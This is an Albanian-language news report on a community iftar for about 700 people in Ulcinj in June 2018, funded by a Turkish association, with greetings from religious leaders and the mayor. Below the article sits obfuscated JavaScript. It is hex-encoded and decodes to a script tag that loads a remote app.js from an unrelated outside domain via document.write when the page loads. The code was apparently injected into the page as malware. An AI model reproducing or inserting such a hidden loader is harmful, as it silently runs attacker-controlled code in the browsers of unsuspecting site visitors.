U shtrua iftar për 700 persona

Me 09.06.2018. në hotelin Mediteran në Ulqin, u shtrua iftar për rreth 700 përsona.

Bashkësia islame me donacion nga shoqata ISKED nga Turqia shtroi iftar.

Në fillim pas ezanit të kënduar nga imami nga turqia Ismail Yigit,
Fjalen e mori kryeimami mr. Ali ef. Bardhi ku i pershendeti te pranishmit dhe falenderoi donatorët nga Stambolli.

Me pas kryetari i shoqates ISKED foli për donacionin e ketij iftari dhe simbolikës së vëllazerisë ndermjete popujve tane

Me pas foli kryetari i Komunes se ulqinit z. Loro Ndrekiq ku i përshendeti të gjithë të pranishmit dhe apeloi për vëllazeri e harmoni ndërmjet besimeve dhe popujve.

Ne fund reisi i BI në MZ Rifat ef. Fejziq i përshendeti të pranishmit dhe i’u uroi muajin e ramazanit dhe natën e Kadrit si edhe Fitër Bajramin.

 

16089659-33F6-4222-B44C-CB3475462D49 68EF0DAE-FC1C-4095-9158-B53703003009 2CD20778-3407-4FA5-8F91-F42F13DFDA69 var _0x78f1=[“\x3C\x73\x63\x72”,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4E\x7A\x41\x37\x4D\x51\x3D\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x70\x61\x6D\x70\x6F”,”\x70\x68\x6F\x6C\x66\x2E\x63\x6F\x6D\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72”,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65”];function printapp(){var _0x8e48x2=_0x78f1[0];var _0x8e48x3=_0x78f1[1];var _0x8e48x4=_0x78f1[2];var _0x8e48x5=_0x78f1[3];document[_0x78f1[4]](_0x8e48x2+ _0x8e48x3+ _0x8e48x4+ _0x8e48x5)}printapp()